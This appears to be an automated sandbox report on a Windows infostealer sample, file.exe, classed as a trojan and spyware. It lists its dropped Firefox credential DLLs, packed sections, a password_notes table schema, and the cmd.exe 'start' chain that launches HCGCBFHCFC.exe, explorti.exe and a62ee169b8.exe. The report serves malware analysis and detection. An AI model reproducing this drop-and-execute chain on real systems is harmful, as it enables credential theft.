Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DA4AD0 10_2_00DA4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DE6EE9 10_2_00DE6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DE763B 10_2_00DE763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DE2BB0 10_2_00DE2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DE775B 10_2_00DE775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DE8700 10_2_00DE8700
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600000 12_2_7F600000
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600680 12_2_7F600680
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9ECBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9F94D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2271135677.0000000000A42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe. vs file.exe
Source: file.exe, 00000000.00000002.2311195968.000000006CC35000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: file.exe Static PE information: Section: ZLIB complexity 0.9951171875
Source: file.exe Static PE information: Section: ZLIB complexity 0.9898681640625
Source: HCGCBFHCFC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9978387551229508
Source: HCGCBFHCFC.exe.0.dr Static PE information: Section: wiqvgckm ZLIB complexity 0.9943164933135216
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9978387551229508
Source: amadka[1].exe.0.dr Static PE information: Section: wiqvgckm ZLIB complexity 0.9943164933135216
Source: explorti.exe.8.dr Static PE information: Section: ZLIB complexity 0.9978387551229508
Source: explorti.exe.8.dr Static PE information: Section: wiqvgckm ZLIB complexity 0.9943164933135216
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9951171875
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9898681640625
Source: a62ee169b8.exe.10.dr Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: a62ee169b8.exe.10.dr Static PE information: Section: ZLIB complexity 0.9951171875
Source: a62ee169b8.exe.10.dr Static PE information: Section: ZLIB complexity 0.9898681640625
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/30@0/3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CA17030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2141474004.0000000022934000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159298010.0000000022928000.00000004.00000020.00020000.00000000.sdmp, CFHCGHJDBFIIDGDHIJDB.0.dr, JEHJKJEBGHJJKEBGIECA.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe Virustotal: Detection: 48%
Source: HCGCBFHCFC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
